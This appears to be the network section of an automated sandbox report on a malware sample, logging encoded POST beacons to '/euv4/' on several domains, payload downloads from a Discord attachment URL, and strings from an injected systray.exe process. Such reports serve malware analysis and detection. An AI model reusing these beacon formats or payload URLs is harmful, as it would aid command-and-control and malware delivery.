BXxXk=fDzhVyBCZTAb5rVbbvL7V5VROgdEBd5IpBzqq4RmPPZN9FMKSA4BMYTuRyB7aFtvmsCbESwvWuWTjrdNs28SzvPV4qk5wuvnQtsSH8olyNn-HE4DQNXg9_28PvzwPfeDW662zbclYIL4SBWsiHMi(OnoMdaVxf2Gnup1jlQOkeaRkliID3VxkaqxvjAtO4kwM99mD-bJmKCo70C9vKx9icNeVw2NsgxPAMsrYV6czHskVNIwGbmOlLpdNAq94O6WNc9VKSaOHWTW8Km19lmxiDXNVJdRVs9hStHvCfgvoDPUyaYSk7r0(5B9p-~jVweFUwxTuJM-H8hRI5voGCWV4ZIpsPO694kR48bSXCH4KrJL19KOT_xYVO9m9m9p0fzZe-RodSEYIt9LnftITg).
Source: global traffic HTTP traffic detected: POST /euv4/ HTTP/1.1Host: www.mehfeels.comConnection: closeContent-Length: 36479Cache-Control: no-cacheOrigin: http://www.mehfeels.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.mehfeels.com/euv4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 42 58 78 58 6b 3d 66 44 7a 68 56 7a 39 51 48 77 45 34 33 62 4a 52 66 64 37 76 62 6f 6c 58 4d 77 5a 78 46 73 46 54 74 7a 62 41 75 35 68 66 4f 4e 4a 58 77 56 34 72 57 44 49 4a 4d 59 69 34 64 68 31 5f 51 46 68 6f 6d 73 71 6c 45 53 6b 76 58 75 75 44 36 4e 41 69 72 55 55 54 79 50 50 70 37 71 6c 76 30 73 61 46 51 74 6f 38 48 38 68 67 78 2d 7a 2d 49 42 6b 44 45 2d 50 72 7a 5f 32 36 41 5f 43 68 4c 65 6a 76 57 36 69 51 7a 61 67 6c 5a 34 50 34 55 68 6d 72 31 51 68 30 32 2d 6e 68 65 4e 61 4d 71 76 71 53 6e 74 46 4c 6a 6b 73 4f 6b 73 4f 52 6c 30 43 49 46 47 56 75 76 4b 71 4f 35 54 41 38 66 6f 6f 62 4d 39 67 30 44 36 6a 33 6d 59 65 6f 37 45 43 2d 72 64 46 66 6d 50 56 77 59 52 53 36 73 67 4d 45 41 5a 4d 6a 59 51 7a 6f 6c 6c 31 61 4a 5f 68 6c 47 5a 4b 6f 69 62 70 6e 66 67 72 35 34 4f 37 6e 4e 63 39 72 4b 53 71 4f 48 52 50 57 38 76 71 31 71 33 4f 32 74 44 58 4d 4d 5a 63 4d 66 4d 68 4e 53 74 4f 30 43 65 4a 4b 6f 30 33 55 6a 4c 6f 53 73 6f 7a 7a 6e 4a 42 5f 6b 65 7e 32 66 51 65 30 55 77 78 6c 75 49 4d 58 48 4b 35 52 4f 6f 76 6f 47 67 4f 56 36 70 49 70 78 5f 4f 43 7a 59 34 6e 34 38 44 57 58 44 57 50 4b 59 46 4c 79 73 71 4f 54 65 78 59 53 2d 39 6d 78 47 38 56 30 4b 62 54 58 75 39 64 4f 42 34 78 42 71 63 2d 79 66 34 52 44 33 45 35 7e 34 52 77 6c 71 63 53 66 73 4b 68 79 79 58 56 74 6c 6d 39 48 59 34 64 67 4b 7e 42 65 35 54 68 69 4b 30 33 79 76 49 75 31 32 4d 4b 4e 53 4f 78 42 4b 66 46 66 4b 67 5f 73 44 74 35 6a 45 4d 58 4e 6a 44 42 31 55 59 6a 58 77 51 37 46 6c 65 47 42 6d 58 53 53 76 45 46 79 50 57 7a 45 49 4c 45 4a 37 55 45 41 63 53 71 77 36 58 48 36 76 65 4a 34 6d 34 42 42 34 73 48 69 61 31 63 4a 54 4c 6f 79 34 5a 6f 7a 35 38 47 47 51 79 62 54 65 6c 61 54 53 49 50 54 46 68 69 7a 4e 50 5f 6e 71 45 74 55 71 39 66 43 64 76 4c 35 47 6b 59 66 6f 75 2d 56 36 38 6d 39 75 77 31 62 71 33 72 38 70 57 54 67 45 4c 62 49 5f 38 49 54 71 77 6e 74 4a 58 5f 6d 6c 6a 4f 76 51 77 41 48 33 7a 5a 49 49 52 31 62 39 50 48 57 42 52 39 6f 41 65 61 61 44 41 41 43 6c 32 66 74 36 44 6a 41 65 69 54 57 73 64 41 4b 7a 33 43 7a 6d 5a 4e 6c 34 63 78 62 65 4e 51 6e 42 56 34 79 5f 4f 48 59 45 65 5a 36 5f 6e 46 62 4d 6c 6b 35 59 39 54 57 48 74 34 51 4a 57 47 4c 67 71 56 4d 32 77 51 31 68 63 71 78 37 6c 31 61 72 64 4e 39 30 67 63 43 70 30 57 72 48 53 4f 4b 39 28 6e 28 37 37 41 75 76 4f 4f 6b 78 4c 5a 5a 58 7e 46 34 4c 6f 51 46 37 73 64 62 57 4f 73 66 65 4b 74 51 31 28 72 5a 65 7e 42 32 66 39 49 47 48 76 4d 4e 36 54 51 43 54 61 45 30 6a 34 72 6d 5a 49 6b 73 42 65 4c 72 31 58 31 46 48 6c 42 33 33 75 6f 30 47 4c 70 7a 64 6d 58 4b 57 79 74 65 4d 5a 34 53 76 63 53 31 46 58 46 70 6f 38 49 36 73 47 71 79 6c 56 52
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 28 Jan 2022 18:03:58 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingVary: Accept-EncodingData Raw: 31 30 0d 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 10File not found.0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Fri, 28 Jan 2022 18:04:04 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 28 Jan 2022 18:04:14 GMTContent-Type: text/htmlContent-Length: 275ETag: "61f22041-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 28 Jan 2022 18:05:16 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Sorting-Hat-PodId: 194X-Sorting-Hat-ShopId: 59946500291X-Dc: gcp-europe-west1X-Request-ID: a7524e7b-21da-41ed-8d26-0413ce3d8724X-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Download-Options: noopenX-Content-Type-Options: nosniffCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 6d4c25e13f0e915f-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 28 Jan 2022 18:05:33 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 278Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 62 75 62 75 33 63 69 6e 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.bubu3cin.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 28 Jan 2022 18:06:00 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 278Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 62 75 62 75 33 63 69 6e 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.bubu3cin.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 28 Jan 2022 18:06:17 GMTContent-Type: text/htmlContent-Length: 275ETag: "61f22041-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: systray.exe, 00000014.00000002.810537500.00000000001AF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico%c0
Source: systray.exe, 00000014.00000002.813138180.00000000052DB000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.ahmadfaizlajis.com
Source: systray.exe, 00000014.00000002.813138180.00000000052DB000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.ahmadfaizlajis.com/euv4/
Source: systray.exe, 00000014.00000002.810537500.00000000001AF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: systray.exe, 00000014.00000002.810537500.00000000001AF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
Source: systray.exe, 00000014.00000002.810537500.00000000001AF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp3
Source: systray.exe, 00000014.00000002.810537500.00000000001AF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.msn.com/de-ch/ocid=iehp
Source: systray.exe, 00000014.00000002.810537500.00000000001AF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.msn.com/ocid=iehp141
Source: systray.exe, 00000014.00000002.810537500.00000000001AF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/
Source: systray.exe, 00000014.00000002.810537500.00000000001AF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/g
Source: systray.exe, 00000014.00000002.810537500.00000000001AF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: systray.exe, 00000014.00000002.810537500.00000000001AF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.pngQcd
Source: systray.exe, 00000014.00000002.810537500.00000000001AF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowser=0
Source: unknown HTTP traffic detected: POST /euv4/ HTTP/1.1Host: www.mehfeels.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.mehfeels.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.mehfeels.com/euv4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 42 58 78 58 6b 3d 66 44 7a 68 56 79 42 43 5a 54 41 62 35 72 56 62 62 76 4c 37 56 35 56 52 4f 67 64 45 42 64 35 49 70 42 7a 71 71 34 52 6d 50 50 5a 4e 39 46 4d 4b 53 41 34 42 4d 59 54 75 52 79 42 37 61 46 74 76 6d 73 43 62 45 53 77 76 57 75 57 54 6a 72 64 4e 73 32 38 53 7a 76 50 56 34 71 6b 35 77 75 76 6e 51 74 73 53 48 38 6f 6c 79 4e 6e 2d 48 45 34 44 51 4e 58 67 39 5f 32 38 50 76 7a 77 50 66 65 44 57 36 36 32 7a 62 63 6c 59 49 4c 34 53 42 57 73 69 48 4d 69 28 4f 6e 6f 4d 64 61 56 78 66 32 47 6e 75 70 31 6a 6c 51 4f 6b 65 61 52 6b 6c 69 49 44 33 56 78 6b 61 71 78 76 6a 41 74 4f 34 6b 77 4d 39 39 6d 44 2d 62 4a 6d 4b 43 6f 37 30 43 39 76 4b 78 39 69 63 4e 65 56 77 32 4e 73 67 78 50 41 4d 73 72 59 56 36 63 7a 48 73 6b 56 4e 49 77 47 62 6d 4f 6c 4c 70 64 4e 41 71 39 34 4f 36 57 4e 63 39 56 4b 53 61 4f 48 57 54 57 38 4b 6d 31 39 6c 6d 78 69 44 58 4e 56 4a 64 52 56 73 39 68 53 74 48 76 43 66 67 76 6f 44 50 55 79 61 59 53 6b 37 72 30 28 35 42 39 70 2d 7e 6a 56 77 65 46 55 77 78 54 75 4a 4d 2d 48 38 68 52 49 35 76 6f 47 43 57 56 34 5a 49 70 73 50 4f 36 39 34 6b 52 34 38 62 53 58 43 48 34 4b 72 4a 4c 31 39 4b 4f 54 5f 78 59 56 4f 39 6d 39 6d 39 70 30 66 7a 5a 65 2d 52 6f 64 53 45 59 49 74 39 4c 6e 66 74 49 54 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: BXxXk=fDzhVyBCZTAb5rVbbvL7V5VROgdEBd5IpBzqq4RmPPZN9FMKSA4BMYTuRyB7aFtvmsCbESwvWuWTjrdNs28SzvPV4qk5wuvnQtsSH8olyNn-HE4DQNXg9_28PvzwPfeDW662zbclYIL4SBWsiHMi(OnoMdaVxf2Gnup1jlQOkeaRkliID3VxkaqxvjAtO4kwM99mD-bJmKCo70C9vKx9icNeVw2NsgxPAMsrYV6czHskVNIwGbmOlLpdNAq94O6WNc9VKSaOHWTW8Km19lmxiDXNVJdRVs9hStHvCfgvoDPUyaYSk7r0(5B9p-~jVweFUwxTuJM-H8hRI5voGCWV4ZIpsPO694kR48bSXCH4KrJL19KOT_xYVO9m9m9p0fzZe-RodSEYIt9LnftITg).
Source: unknown DNS traffic detected: queries for: cdn.discordapp.com
Source: global traffic HTTP traffic detected: GET /attachments/935207028299796504/936481003038449725/Tdfgwnfyyvslxmhqyfimidqqywchnji HTTP/1.1User-Agent: lValiHost: cdn.discordapp.com
Source: global traffic HTTP traffic detected: GET /attachments/935207028299796504/936481003038449725/Tdfgwnfyyvslxmhqyfimidqqywchnji HTTP/1.1User-Agent: 9Host: cdn.discordapp.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /attachments/935207028299796504/936481003038449725/Tdfgwnfyyvslxmhqyfimidqqywchnji HTTP/1.1User-Agent: 20Host: cdn.discordapp.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /attachments/935207028299796504/936481003038449725/Tdfgwnfyyvslxmhqyfimidqqywchnji HTTP/1.1User-Agent: 84Host: cdn.discordapp.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /euv4/?x6VPE=5jf8Bvhx9&BXxXk=85mQjwU+wMRs83r0GOSrcIreOiba9zyWW+CS0GLKbh9gHly9YGpiGKD2AN9MIjoCEE7/ HTTP/1.1Host: www.handejqr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /euv4/?BXxXk=cI3g5knJJqXkP8IW+Xza8klzbxDoXV64MSKEiVzom8B632K++iscclio36YMg8rUOzdW&x6VPE=5jf8Bvhx9 HTTP/1.1Host: www.game2plays.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /euv4/?x6VPE=5jf8Bvhx9&BXxXk=HAa1B5AppjYU5aCns58Lm/lX0LPKjP/AouTCOfgyvRhMztBouTXibUsUAqGI4dNLtbsU HTTP/1.1Host: www.the-pumps.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /euv4/?BXxXk=dD0iDvhn43tXR1Irz5moIEmsbBY1tPeSvnURlL34d3R1xCqqo0E9W1015A+nmD7pBEru&x6VPE=5jf8Bvhx9 HTTP/1.1Host: www.bendyourtongue.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
